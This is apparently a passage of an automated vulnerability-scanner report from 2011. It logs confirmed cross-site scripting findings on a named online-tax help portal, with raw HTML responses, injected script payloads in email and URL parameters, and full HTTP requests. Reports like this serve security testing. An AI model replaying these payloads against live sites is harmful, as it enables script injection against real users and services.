Date: Fri, 29 Apr 2011 23:56:26 GMT
Server: Apache
P3P: policyref="https://olt.custhelp.com/rnt/rnw/p3p/rnw_p3p_ref.xml",CP="CAO CURa ADMa DEVa OUR BUS IND UNI COM NAV"
RNT-Time: D=227117 t=1304121386842005
RNT-Machine: 04
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 3421
X-Cnection: close
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html lang="en_US"><!-- Head ->>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>- --><head><meta http-equiv="Pragma" content="no-cache"/><meta http-equiv="Expires" content="-1"/><meta name="robots" content="noindex,nofollow"><link rel="stylesheet" type="text/css" href="https://www.olt.com/main/home/styles.css" /><link rel="stylesheet" type="text/css" href="/rnt/rnw/css/enduser.css"><title>Search Tips</title></head><!-- Body ->>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>- --><body class="bgcolor"><body topmargin="0" leftmargin="0" marginwidth="0" marginheight="0" bgcolor="#ffffff" text="#000000" link="#000000" vlink="#000000" alink="#000000"><table height="100" cellSpacing="0" cellPadding="0" width="790" border="0"> <tr> <td vAlign="bottom"> <table cellSpacing="0" cellPadding="0" width="100%" background="https://www.olt.com/main/home/images/tile-hdr.gif" border="0"> <tr> <td rowSpan="2"><img height="95" src="https://www.olt.com/main/home/images/spacer.gif" width="10"></td> <td rowSpan="2"><img src="https://www.olt.com/main/home/images/hdr-logo-home.gif" alt="Online Taxes OLT Logo" title="Online Taxes OLT Logo" width="200" height="95"></td> <td align="right" width="100%"><img src="https://www.olt.com/main/home/images/hdr-slogan.gif" alt="Online Taxes slogan - Simple fast Secure" title="Online Taxes Slogan - Simple Fast Accurate" width="175" height="40"></td> <td><img height="40" src="https://www.olt.com/main/home/images/spacer.gif" width="10"></td> </tr> <tr> <td class="hdrnav" vAlign="top" align="right"><nobr><a href="https://www.olt.com/main/home/default.asp">Home</a> &nbsp;|&nbsp; <a href="https://www.olt.com/main/home/about.asp">About Us</a> &nbsp;|&nbsp; <a href="https://www.olt.com/main/home/products.asp">Products</a> &nbsp;|&nbsp; <a href="https://www.olt.com/main/home/service.asp">Customer Service</a> &nbsp;|&nbsp; <a href="https://www.olt.com/main/home/states.asp">States</a> &nbsp;|&nbsp; <a href="https://www.olt.com/main/home/taxcorner.asp">Tax Corner</a></nobr></td> <td><img height="55" src="https://www.olt.com/main/home/images/spacer.gif" width="10"></td> </tr> </table> </td> </tr> </table><table><tr><td width="790"><br /><!-- Tab Area ->>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>- --><table cellpadding="0" cellspacing="0" border="0" width="100%"> <tr> <td width="1%" valign="bottom"> <table cellpadding="0" cellspacing="0" border="0"> <tr> <td align="left" valign="top"><img src="/rnt/rnw/img/enduser/tabl.gif" width="6" height="6" alt="" /></td> <td width="100%" class="tab" name="&nbsp;answers&nbsp;_tab" align="center" rowspan="2" nowrap> <a class="tab" name="&nbsp;answers&nbsp;_tab_link" href="std_alp.php?OLTSite=OLTFree73541'"--%5E%5C/style%5E%5C/script%5E%5Cscript%5Enetsparker(0x001DF6)%5C/script%5E&p_sid=fsEbhKsk&amp;p_accessibility=1&amp;p_redirect=3">&nbsp;Answers&nbsp;</a> </td> <td align="right" valign="top"><img src="/rnt/rnw/img/enduser/tabr.gif" width="6" height="6" alt="" /></td> </tr> <tr> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> </tr> </table> </td> <td width="1%">&nbsp;</td> <td width="1%" valign="bottom"> <table cellpadding="0" cellspacing="0" border="0"> <tr> <td align="left" valign="top"><img src="/rnt/rnw/img/enduser/tabl.gif" width="6" height="6" alt="" /></td> <td width="100%" class="tab" name="ask_a_question_tab" align="center" rowspan="2" nowrap> <a class="tab" name="ask_a_question_tab_link" href="ask.php?OLTSite=OLTFree73541'"--%5E%5C/style%5E%5C/script%5E%5Cscript%5Enetsparker(0x001DF6)%5C/script%5E&p_sid=fsEbhKsk&amp;p_accessibility=1&amp;p_redirect=3">Ask a Question</a> </td> <td align="right" valign="top"><img src="/rnt/rnw/img/enduser/tabr.gif" width="6" height="6" alt="" /></td> </tr> <tr> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> </tr> </table> </td> <td width="1%">&nbsp;</td> <td width="1%" valign="bottom"> <table cellpadding="0" cellspacing="0" border="0"> <tr> <td align="left" valign="top"><img src="/rnt/rnw/img/enduser/tabl.gif" width="6" height="6" alt="" /></td> <td width="100%" class="tab" name="live_help_tab" align="center" rowspan="2" nowrap> <a class="tab" name="live_help_tab_link" href="chat.php?OLTSite=OLTFree73541'"--%5E%5C/style%5E%5C/script%5E%5Cscript%5Enetsparker(0x001DF6)%5C/script%5E&p_sid=fsEbhKsk&amp;p_accessibility=1&amp;p_redirect=3">Live Help</a> </td> <td align="right" valign="top"><img src="/rnt/rnw/img/enduser/tabr.gif" width="6" height="6" alt="" /></td> </tr> <tr> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> </tr> </table> </td> <td width="1%">&nbsp;</td> <td width="1%" valign="bottom"> <table cellpadding="0" cellspacing="0" border="0"> <tr> <td align="left" valign="top"><img src="/rnt/rnw/img/enduser/tabl.gif" width="6" height="6" alt="" /></td> <td width="100%" class="tab" name="&nbsp;my_stuff&nbsp;_tab" align="center" rowspan="2" nowrap> <a class="tab" name="&nbsp;my_stuff&nbsp;_tab_link" href="myovr.php?OLTSite=OLTFree73541'"--%5E%5C/style%5E%5C/script%5E%5Cscript%5Enetsparker(0x001DF6)%5C/script%5E&p_sid=fsEbhKsk&amp;p_accessibility=1&amp;p_redirect=3">&nbsp;My Stuff&nbsp;</a> </td> <td align="right" valign="top"><img src="/rnt/rnw/img/enduser/tabr.gif" width="6" height="6" alt="" /></td> </tr> <tr> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> </tr> </table> </td> <td width="1%">&nbsp;</td> <td width="80%"> <a href="accessibility.php?p_accessibility=0&p_redirect=3"> hide accessible links </a> &nbsp;</td> <td width="1%" valign="bottom"> <table width="1%" cellpadding="0" cellspacing="0" border="0"> <tr> <td width="1%" class="seltabbtn" align="left" valign="top"><img src="/rnt/rnw/img/trnsp.gif" width="1" height="6" alt="" /></td> <td width="2%" name="_tab" class="seltabbtn" align="center" valign="middle" nowrap rowspan="2"> <a class="seltabbtn" href="help_general.php?OLTSite=OLTFree73541'"--></style></script><script>netsparker(0x001DF6)</script>&p_sid=fsEbhKsk&amp;p_accessibility=1&amp;p_redirect=3"> &nbsp;&nbsp;Help&nbsp;&nbsp; </a> </td> <td width="1%" class="seltabbtn" align="right" valign="top"><img src="/rnt/rnw/img/trnsp.gif" width="1" height="6" alt="" /></td> </tr> <tr> <td class="seltabbtn"> <img src="/rnt/rnw/img/trnsp.gif" width="1" height="14" alt="" /> </td> <td class="seltabbtn"> <img src="/rnt/rnw/img/trnsp.gif" width="1" height="14" alt="" /> </td> </tr> </table> </td> </tr><!-- Subtab Area ->>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>- --> <tr> <td class="seltab" colspan="11"> <table cellpadding="0" cellspacing="4" border="0" width="100%"> <tr> <td class="subtabarea" align="center" width="50%"> <table cellpadding="0" cellspacing="0" border="0" width="60%"> <tr> <td align="right" rowspan="3"><img height="19" width="8" src="/rnt/rnw/img/enduser/stoutl.gif" alt="" /></td> <td bgcolor="white"><img src="/rnt/rnw/img/trnsp.gif" width="1" height="2" alt="" /></td> <td align="left" rowspan="3"><img height="19" width="8" src="/rnt/rnw/img/enduser/stoutr.gif" alt="" /></td> </tr> <tr> <td class="subtabbtn" name="general_help_tab_bar_btn" align="center" nowrap><a class="subtab" href="help_general.php?OLTSite=OLTFree73541'"--%5E%5C/style%5E%5C/script%5E%5Cscript%5Enetsparker(0x001DF6)%5C/script%5E&p_sid=fsEbhKsk&amp;p_accessibility=1&amp;p_redirect=3&amp;p_depth=2">General Help</a></td> </tr> <tr> <td bgcolor="black"><img src="/rnt/rnw/img/trnsp.gif" width="1" height="2" alt="" /></td> </tr> </table> </td> <td class="subtabarea" align="center" width="50%"> <table cellpadding="0" cellspacing="0" border="0" width="60%"> <tr> <td align="right" rowspan="3"><img height="19" width="8" src="/rnt/rnw/img/enduser/stinl.gif" alt="" /></td> <td bgcolor="black"><img src="/rnt/rnw/img/trnsp.gif" width="1" height="2" alt="" /></td> <td align="left" rowspan="3"><img height="19" width="8" src="/rnt/rnw/img/enduser/stinr.gif" alt="" /></td> </tr> <tr> <td class="subtabbtn" name="search_tips_tab_bar_btn" align="center" nowrap><a class="selsubtab" href="help_search.php?OLTSite=OLTFree73541'"--%5E%5C/style%5E%5C/script%5E%5Cscript%5Enetsparker(0x001DF6)%5C/script%5E&p_sid=fsEbhKsk&amp;p_accessibility=1&amp;p_redirect=3&amp;p_depth=2">Search Tips</a></td> </tr> <tr> <td bgcolor="white"><img src="/rnt/rnw/img/trnsp.gif" width="1" height="2" alt="" /></td> </tr> </table> </td> </tr> </table> </td> </tr> <tr><td colspan="10"></td></tr> <tr><td colspan="10"><img src="/rnt/rnw/img/trnsp.gif" width="1" height="4" alt="" /></td></tr></table><!-- Top bar ->>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>- --><table cellpadding="0" cellspacing="0" border="0" width="100%"><tr><td align="right"><img height="6" width="6" src="/rnt/rnw/img/enduser/tl.gif" alt="" /></td><td width="100%" class="form" colspan="2"><img height="6" width="1" src="/rnt/rnw/img/trnsp.gif" alt="" /></td><td align="left"><img height="6" width="6" src="/rnt/rnw/img/enduser/tr.gif" alt="" /></td></tr><!-- Help Text ->>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>- --> <tr><td class="form" align="right" rowspan="15"><img height="1" width="1" src="/rnt/rnw/img/trnsp.gif" alt="" /></td><td class="bar" colspan="2"><h2 class="subtitle">&nbsp;In general...</h2></td><td class="form" align="left" rowspan="15"><img height="1" width="1" src="/rnt/rnw/img/trnsp.gif" alt="" /></td> </tr><tr valign="top"><th width="20%" class="sideheading">Narrow your search</th><td class="htext">Select products and categories from the drop-down menus to narrow your search.</td></tr><tr valign="top"><th class="sideheading">To require words</th><td class="htext">Use a plus (+) symbol before a word to find only documents containing that word. <br><img height="1" width="40" src="/rnt/rnw/img/trnsp.gif" alt="" /> <i>Example</i>: Type <font color=darkgreen>+wildlife +bear</font> to find documents that contain both words <font color=darkgreen>wildlife</font> and <font color=darkgreen>bear</font>.<br/></td></tr><tr valign="top"><th class="sideheading">To exclude words</th><td class="htext">Use a minus (-) symbol before a word to exclude documents containing that word. <br><img height="1" width="40" src="/rnt/rnw/img/trnsp.gif" alt="" /> <i>Example</i>: Type <font color=darkgreen>wildlife -moose</font> to find documents that contain the word <font color=darkgreen>wildlife</font> but not <font color=darkgreen>moose</font>.<br/></td></tr><tr valign="top"><th class="sideheading">Use uncommon words</th><td class="htext">Use uncommon words to retrieve documents with more focused results.</td></tr><tr><td class="form" align="right" rowspan="1" colspan="2"><img height="12" width="10" src="/rnt/rnw/img/trnsp.gif" alt="" /></tr><!-- Center >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>- --><tr><td class="bar" colspan="2"><h2 class="subtitle"..
- /cgi-bin/olt.cfg/php/enduser/acct_new_submit.php

/cgi-bin/olt.cfg/php/enduser/acct_new_submit.php CONFIRMED

https://olt.custhelp.com/cgi-bin/olt.cfg/php/enduser/acct_new_submit.php?p_sid=TyYLtJsk&p_lva=3&p_sp..

Parameters

Parameter Type Value
p_sid GET TyYLtJsk
p_lva GET 3
p_sp GET 3
p_li GET 3
p_accessibility GET 3
p_redirect GET 3
create_acct_btn POST Create a New Account
p_accessibility POST 0
p_countryid POST 3
p_email POST '"--></style></script><script>alert(0x001F52)</script>
p_email_alt1 POST netsparker@example.com
p_email_alt2 POST netsparker@example.com
p_first_name POST Smith
p_last_name POST Smith
p_li POST 3
p_lva POST 3
p_next_page POST myovr.php
p_passwd POST 3
p_passwd2 POST 3
p_ph_asst POST 3
p_ph_fax POST 3
p_ph_home POST 3
p_ph_mobile POST 3
p_ph_office POST 3
p_postal_number POST 3
p_provid POST 3
p_question POST 3
p_redirect POST 3
p_sid POST TyYLtJsk
p_sp POST 3
p_subject POST 3
p_token POST
p_userid POST 3
submit_btn POST Create Account

Request

POST /cgi-bin/olt.cfg/php/enduser/acct_new_submit.php?p_sid=TyYLtJsk&p_lva=3&p_sp=3&p_li=3&p_accessibility=3&p_redirect=3 HTTP/1.1
Referer: https://olt.custhelp.com/cgi-bin/olt.cfg/php/enduser/acct_new.php
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: olt.custhelp.com
Cookie: rnw_accessibility=1; rnw_enduser_login_start=LOGIN_START
Content-Length: 538
Accept-Encoding: gzip, deflate

create_acct_btn=Create+a+New+Account&p_accessibility=0&p_countryid=3&p_email=%00%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker(0x001F52)%3C%2Fscript%3E&p_email_alt1=netsparker%40example.com&p_email_alt2=netsparker%40example.com&p_first_name=Smith&p_last_name=Smith&p_li=3&p_lva=3&p_next_page=myovr.php&p_passwd=3&p_passwd2=3&p_ph_asst=3&p_ph_fax=3&p_ph_home=3&p_ph_mobile=3&p_ph_office=3&p_postal_number=3&p_provid=3&p_question=3&p_redirect=3&p_sid=TyYLtJsk&p_sp=3&p_subject=3&p_token=&p_userid=3&submit_btn=Create+Account

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 00:00:04 GMT
Server: Apache
P3P: policyref="https://olt.custhelp.com/rnt/rnw/p3p/rnw_p3p_ref.xml",CP="CAO CURa ADMa DEVa OUR BUS IND UNI COM NAV"
Set-Cookie: rnw_enduser_login_start=LOGIN_START; expires=Sat, 30-Apr-2011 00:20:04 GMT
RNT-Time: D=252056 t=1304121604083922
RNT-Machine: 06
X-Cnection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html lang="en_US"><!-- Head ->>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>- --><head><meta http-equiv="Pragma" content="no-cache"/><meta http-equiv="Expires" content="-1"/><meta name="robots" content="noindex,nofollow"><link rel="stylesheet" type="text/css" href="https://www.olt.com/main/home/styles.css" /><link rel="stylesheet" type="text/css" href="/rnt/rnw/css/enduser.css"><title>Create a New Account</title><script type="text/javascript" src="/rnt/rnw/javascript/enduser.js" language="JavaScript"></script><script type="text/javascript"> // --------------------------------------------var _submit_accepted = false;var phone_numbers = new Array('', '', '', '', '');var p_postal_emask, p_postal_fstr, p_postal_dmask;var p_contact_phone_emask, p_contact_phone_fstr, p_contact_phone_dmask;var no_test = false, mask_str = null, cur_mask = null;var old_phone = 0;var postal_number = '';var submit_flag = true;// ----------------------------------------------------------------------------function _putCustomFieldMasks(formName){ for(i = 0; i < _fields.length; i++) if(_fields[i].name.match('_ccf_')) if(document[formName]['custom_text_' + _fields[i].name]) put_mask(_fields[i].name, document[formName]['custom_text_' + _fields[i].name].value, document[formName], 0); else if(document[formName]['custom_text_lh_' + _fields[i].name]) { put_mask(_fields[i].name, document[formName]['custom_text_lh_' + _fields[i].name].value, document[formName], 0); document.getElementById(_fields[i].name + '_mask').innerHTML=''; }}// ----------------------------------------------------------------------------function init(){}// ----------------------------------------------------------------------------function _do_submit(form){ var chk_val, ph_mask, pt_mask; var msgs = new Array( "The username you have entered contains spaces. Please try again.", "Username must not contain quote characters. Please try again.", "The passwords you have entered do not match.\n\nPlease re-enter them.", "Passwords must be at least 5 characters long."); if ((form.p_email.value != "") && (form.p_email.value == form.p_email_alt1.value || form.p_email.value == form.p_email_alt2.value || ((form.p_email_alt1.value != "") && (form.p_email_alt1.value == form.p_email_alt2.value)))) { alert("An email address must be unique across the Email Address, Email Alt 1, and Email Alt 2 fields."); return(false); } if (_submit_accepted) // prevents NN4 resubmission return(false); if (!_validate_acctinfo(form.p_userid, form.p_passwd, form.p_passwd2, 5, msgs)) return(false); chk_val = _check_fields(form.name, fld_data, _fields); form.submit_btn.disabled = chk_val; _submit_accepted = chk_val; if (!chk_val) return (false); return(chk_val);}// - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -function change_phone(num, sel_val){ phone_numbers[old_phone] = num.value; num.value = phone_numbers[sel_val]; old_phone = sel_val;}// - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -function reset_phone(){ document._main.p_contact_phone.value = ''; phone_numbers = ['', '', '', '', ''];}// - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -// - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -var _fields = new Array (new field('p_userid', "Username", 5, 80, 33),new field('p_passwd', "Password", 5, 0, 0),new field('p_email', "Email Address", 5, 0, 37),new field('p_email_alt1', "Email Address", 5, 0, 36),new field('p_email_alt2', "Email Address", 5, 0, 36),new field('p_first_name', "First Name", 5, 0, 33),new field('p_last_name', "Last Name", 5, 0, 33),new field('', '', 0, 0, 0));var fld_data = new field_data("is not an integer.","requires a value.","is not completely specified.","The text entered for \'%s\' exceeds its size limit of %d characters by %d characters.","must only contain valid ascii characters.","does not seem to be a valid email address.","Must contain valid furigana characters","Need to select more options.","Need to select fewer options.","Month","Day","Year","Hour","Minute","(([-!#$%&\'*+/=?^~`{|}\\w]+(\\.[-!#$%&\'*+/=?^~`{|}\\w]+)*)|(\"[^\"]+\"))@[0-9A-Za-z]+(-[0-9A-Za-z]+)*(\\.[0-9A-Za-z]+(-[0-9A-Za-z]+)*)+",0,2010,"must not contain either \'<\' or \'>\'","cannot be negative","Field contains too many characters.","Must contain a valid format character.","is not a valid format character.","Must contain a valid number.","is not a valid number.","Must contain a valid alpha-numeric.","is not a valid alpha-numeric.","Must contain a valid letter.","is not a valid letter.","Must contain a valid character.","is not a valid character.","The correct format is","The value you have entered is less than the smallest value allowed for this field.","The value you have entered is greater than the largest value allowed for this field.","is not a valid date.","is not a valid date. Please enter a date in format","MM","DD","YYYY","Minimum year is:","Maximum year is:");// ------------------------------------------------------------------ </script></head><!-- Body ->>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>- --><body class="bgcolor" onLoad="_set_cursor(); init(); _putCustomFieldMasks('_main')"><body topmargin="0" leftmargin="0" marginwidth="0" marginheight="0" bgcolor="#ffffff" text="#000000" link="#000000" vlink="#000000" alink="#000000"><table height="100" cellSpacing="0" cellPadding="0" width="790" border="0"> <tr> <td vAlign="bottom"> <table cellSpacing="0" cellPadding="0" width="100%" background="https://www.olt.com/main/home/images/tile-hdr.gif" border="0"> <tr> <td rowSpan="2"><img height="95" src="https://www.olt.com/main/home/images/spacer.gif" width="10"></td> <td rowSpan="2"><img src="https://www.olt.com/main/home/images/hdr-logo-home.gif" alt="Online Taxes OLT Logo" title="Online Taxes OLT Logo" width="200" height="95"></td> <td align="right" width="100%"><img src="https://www.olt.com/main/home/images/hdr-slogan.gif" alt="Online Taxes slogan - Simple fast Secure" title="Online Taxes Slogan - Simple Fast Accurate" width="175" height="40"></td> <td><img height="40" src="https://www.olt.com/main/home/images/spacer.gif" width="10"></td> </tr> <tr> <td class="hdrnav" vAlign="top" align="right"><nobr><a href="https://www.olt.com/main/home/default.asp">Home</a> &nbsp;|&nbsp; <a href="https://www.olt.com/main/home/about.asp">About Us</a> &nbsp;|&nbsp; <a href="https://www.olt.com/main/home/products.asp">Products</a> &nbsp;|&nbsp; <a href="https://www.olt.com/main/home/service.asp">Customer Service</a> &nbsp;|&nbsp; <a href="https://www.olt.com/main/home/states.asp">States</a> &nbsp;|&nbsp; <a href="https://www.olt.com/main/home/taxcorner.asp">Tax Corner</a></nobr></td> <td><img height="55" src="https://www.olt.com/main/home/images/spacer.gif" width="10"></td> </tr> </table> </td> </tr> </table><table><tr><td width="790"><br /><form class="block" name="_main" method="post" action="acct_new_submit.php?p_sid=D*52iKsk&amp;p_lva=3&amp;p_sp=&amp;p_li=3&amp;p_accessibility=&amp;p_redirect=" onSubmit="return(_do_submit(this))"><input type="hidden" name="p_next_page" value="myovr.php" /><input type="hidden" name="p_countryid" value="3" /><input type="hidden" name="p_provid" value="3" /><input type="hidden" name="p_ph_office" value="3" /><input type="hidden" name="p_ph_mobile" value="3" /><input type="hidden" name="p_ph_fax" value="3" /><input type="hidden" name="p_ph_asst" value="3" /><input type="hidden" name="p_ph_home" value="3" /><input type="hidden" name="p_postal_number" value="3" /><input type="hidden" name="p_token" value="" /><input type="hidden" name="p_subject" value="3" /><input type="hidden" name="p_question" value="3" /><!-- Tab Area ->>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>- --><table cellpadding="0" cellspacing="0" border="0" width="100%"> <tr> <td width="1%" valign="bottom"> <table cellpadding="0" cellspacing="0" border="0"> <tr> <td align="left" valign="top"><img src="/rnt/rnw/img/enduser/tabl.gif" width="6" height="6" alt="" /></td> <td width="100%" class="tab" name="&nbsp;answers&nbsp;_tab" align="center" rowspan="2" nowrap> <a class="tab" name="&nbsp;answers&nbsp;_tab_link" href="std_alp.php?OLTSite=&p_sid=D*52iKsk&amp;p_accessibility=1&amp;p_redirect=3&amp;p_lva=3&amp;p_li=3">&nbsp;Answers&nbsp;</a> </td> <td align="right" valign="top"><img src="/rnt/rnw/img/enduser/tabr.gif" width="6" height="6" alt="" /></td> </tr> <tr> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> </tr> </table> </td> <td width="1%">&nbsp;</td> <td width="1%" valign="bottom"> <table cellpadding="0" cellspacing="0" border="0"> <tr> <td align="left" valign="top"><img src="/rnt/rnw/img/enduser/tabl.gif" width="6" height="6" alt="" /></td> <td width="100%" class="tab" name="ask_a_question_tab" align="center" rowspan="2" nowrap> <a class="tab" name="ask_a_question_tab_link" href="ask.php?OLTSite=&p_sid=D*52iKsk&amp;p_accessibility=1&amp;p_redirect=3&amp;p_lva=3&amp;p_li=3">Ask a Question</a> </td> <td align="right" valign="top"><img src="/rnt/rnw/img/enduser/tabr.gif" width="6" height="6" alt="" /></td> </tr> <tr> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> </tr> </table> </td> <td width="1%">&nbsp;</td> <td width="1%" valign="bottom"> <table cellpadding="0" cellspacing="0" border="0"> <tr> <td align="left" valign="top"><img src="/rnt/rnw/img/enduser/tabl.gif" width="6" height="6" alt="" /></td> <td width="100%" class="tab" name="live_help_tab" align="center" rowspan="2" nowrap> <a class="tab" name="live_help_tab_link" href="chat.php?OLTSite=&p_sid=D*52iKsk&amp;p_accessibility=1&amp;p_redirect=3&amp;p_lva=3&amp;p_li=3">Live Help</a> </td> <td align="right" valign="top"><img src="/rnt/rnw/img/enduser/tabr.gif" width="6" height="6" alt="" /></td> </tr> <tr> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> </tr> </table> </td> <td width="1%">&nbsp;</td> <td width="1%" valign="bottom"> <table cellpadding="0" cellspacing="0" border="0"> <tr> <td align="left" valign="top"><img src="/rnt/rnw/img/enduser/tabl.gif" width="6" height="6" alt="" /></td> <td width="100%" class="tab" name="&nbsp;my_stuff&nbsp;_tab" align="center" rowspan="2" nowrap> <a class="tab" name="&nbsp;my_stuff&nbsp;_tab_link" href="myovr.php?OLTSite=&p_sid=D*52iKsk&amp;p_accessibility=1&amp;p_redirect=3&amp;p_lva=3&amp;p_li=3">&nbsp;My Stuff&nbsp;</a> </td> <td align="right" valign="top"><img src="/rnt/rnw/img/enduser/tabr.gif" width="6" height="6" alt="" /></td> </tr> <tr> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> </tr> </table> </td> <td width="1%">&nbsp;</td> <td width="80%"> <a href="accessibility.php?p_accessibility=0&p_redirect=3"> hide accessible links </a> &nbsp;</td> </tr><!-- Subtab Area ->>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>- --> <tr> <td class="seltab" colspan="10"> &nbsp; </td> </tr> <tr><td colspan="8"></td></tr> <tr><td colspan="8"><img src="/rnt/rnw/img/trnsp.gif" width="1" height="4" alt="" /></td></tr></table><table cellpadding="0" cellspacing="0" border="0" width="100%"><tr><td align="right"><img height="6" width="6" src="/rnt/rnw/img/enduser/tl.gif" alt="" /></td><td width="100%" class="form"><img height="6" width="1" src="/rnt/rnw/img/trnsp.gif" alt="" /></td><td align="left"><img height="6" width="6" src="/rnt/rnw/img/enduser/tr.gif" alt="" /></td></tr><tr><td class="form"><img height="1" width="1" src="/rnt/rnw/img/trnsp.gif" alt="" /></td><td class="form"><!-- Error message >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>- --><br /><table cellpadding="2" cellspacing="0" border="0" width="100%"><tr><td colspan="2" class="subtitle">&nbsp;Account Creation Failed</td></tr><tr><td colspan="2" class="textcell"><table><tr><td class="textcell">Passwords must be at least 5 characters long.<br />'Email Address' does not seem to be a valid email address.<br /></td></tr></table></td></tr><tr><td><font size="+1">&nbsp;</font></td></tr></table><table align="right"><tr><td><span class="smlabel"><font color="red">*</font> Denotes a required field.</span></td></tr></table><br..
- /cgi-bin/olt.cfg/php/enduser/acct_new_submit.php

/cgi-bin/olt.cfg/php/enduser/acct_new_submit.php CONFIRMED

https://olt.custhelp.com/cgi-bin/olt.cfg/php/enduser/acct_new_submit.php?p_sid=TyYLtJsk&p_lva=3&p_sp..

Parameters

Parameter Type Value
p_sid GET TyYLtJsk
p_lva GET 3
p_sp GET 3
p_li GET 3
p_accessibility GET 3
p_redirect GET 3
create_acct_btn POST Create a New Account
p_accessibility POST 0
p_countryid POST 3
p_email POST netsparker@example.com
p_email_alt1 POST '"--></style></script><script>alert(0x001F64)</script>
p_email_alt2 POST netsparker@example.com
p_first_name POST Smith
p_last_name POST Smith
p_li POST 3
p_lva POST 3
p_next_page POST myovr.php
p_passwd POST 3
p_passwd2 POST 3
p_ph_asst POST 3
p_ph_fax POST 3
p_ph_home POST 3
p_ph_mobile POST 3
p_ph_office POST 3
p_postal_number POST 3
p_provid POST 3
p_question POST 3
p_redirect POST 3
p_sid POST TyYLtJsk
p_sp POST 3
p_subject POST 3
p_token POST
p_userid POST 3
submit_btn POST Create Account

Request

POST /cgi-bin/olt.cfg/php/enduser/acct_new_submit.php?p_sid=TyYLtJsk&p_lva=3&p_sp=3&p_li=3&p_accessibility=3&p_redirect=3 HTTP/1.1
Referer: https://olt.custhelp.com/cgi-bin/olt.cfg/php/enduser/acct_new.php
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: olt.custhelp.com
Cookie: rnw_accessibility=1; rnw_enduser_login_start=LOGIN_START
Content-Length: 538
Accept-Encoding: gzip, deflate

create_acct_btn=Create+a+New+Account&p_accessibility=0&p_countryid=3&p_email=netsparker%40example.com&p_email_alt1=%00%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker(0x001F64)%3C%2Fscript%3E&p_email_alt2=netsparker%40example.com&p_first_name=Smith&p_last_name=Smith&p_li=3&p_lva=3&p_next_page=myovr.php&p_passwd=3&p_passwd2=3&p_ph_asst=3&p_ph_fax=3&p_ph_home=3&p_ph_mobile=3&p_ph_office=3&p_postal_number=3&p_provid=3&p_question=3&p_redirect=3&p_sid=TyYLtJsk&p_sp=3&p_subject=3&p_token=&p_userid=3&submit_btn=Create+Account

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 00:00:10 GMT
Server: Apache
P3P: policyref="https://olt.custhelp.com/rnt/rnw/p3p/rnw_p3p_ref.xml",CP="CAO CURa ADMa DEVa OUR BUS IND UNI COM NAV"
Set-Cookie: rnw_enduser_login_start=LOGIN_START; expires=Sat, 30-Apr-2011 00:20:11 GMT
RNT-Time: D=405048 t=1304121610731668
RNT-Machine: 11
